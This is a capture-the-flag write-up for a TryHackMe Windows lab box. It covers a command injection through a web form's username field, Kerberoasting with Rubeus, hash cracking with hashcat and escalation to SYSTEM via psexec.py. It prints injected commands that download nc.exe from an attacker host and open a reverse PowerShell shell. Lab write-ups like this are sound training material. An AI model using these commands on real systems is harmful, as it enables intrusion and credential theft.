H1 Tryhackme KOTH (Medium Box) Writeup

Difficulty: Medium (Windows)


Well we notice that many ports are open, but the one we are currently interested in is port 80, so go to “Signup” and sign up with the credentials you want.

Go to “profile” and as you can see if you push “Tab” it doesn’t get you going, so something is probably stopping you. Let’s check.

Open inspect element and go to “Network” we can see that the “script.js” file is blocking our functionality.

In this case then, we will simply block it, and we will be able to bypass the block. Right click on “script.js” and press BLOCK url.

Now reload the page and finally we can write in the “username” bar


Now we are good at typing and we know that it is a windows machine, so we will try to do a command injection right on the username bar. In this case we will need nc.exe. Follow my commands.

Now we’re ready to give it our nc.exe to get a reverse shell later.

Command: jin | powershell curl IP:8000/nc.exe -o nc.exe

Now that we have given it nc.exe we can finally get the reverse shell, follow my commands:

Listen on any port you want

Command: jin | nc.exe IP 9001 -e powershell

And we are IN!!!!!


Now we can enumerate the users and they are really many, but we have to find who the administrator is, so we use the command “net user”

We notice that achilles is the Administrator, so the first thing that comes to our mind is to find the hash in SAM, but obviously we will not find any of this and this is simply because we notice that port 88 is open.


I’m trying with GetNPUsers.py but doesn’t work so, we can try with another tool that I leave you in description.

Link tool: https://github.com/r3motecontrol/Ghostpack-CompiledBinaries

We can use Rubeus.exe : Rubeus is a C# toolset for raw Kerberos interaction and abuses.

Ok currently we have transferred our Rubeus.exe and we can use it. Note that the /nowrap command is used to set the hash so that there are no spaces (used for convenience)

Command: .\Rubeus.exe kerberoast /nowrap


Now that we have the hash we can crack it, we notice that it is a kerberos 5 so we go to our hash wiki, and we notice that it is the number 13100

Now we can use john or hashcat for crack the hash, try it

Command: hashcat -m 13100 hashachilles /usr/share/wordlists/rockyou.txt

Now we have the password so let’s go!


For the Privilege escalation we can use Evilwinrm or Psexec.py , i’ll add you the link : https://github.com/SecureAuthCorp/impacket/blob/master/examples/psexec.py

We remember that from nmap the DNSname is troy.thm, we have the password and the user (Administrator), we launch the payload with this last tool.

We are NT Authority\System

I hope this is useful. And good luck.

  • 0xJin

| eCPTX | C|EH Master | CompTIA Security + | eJPT |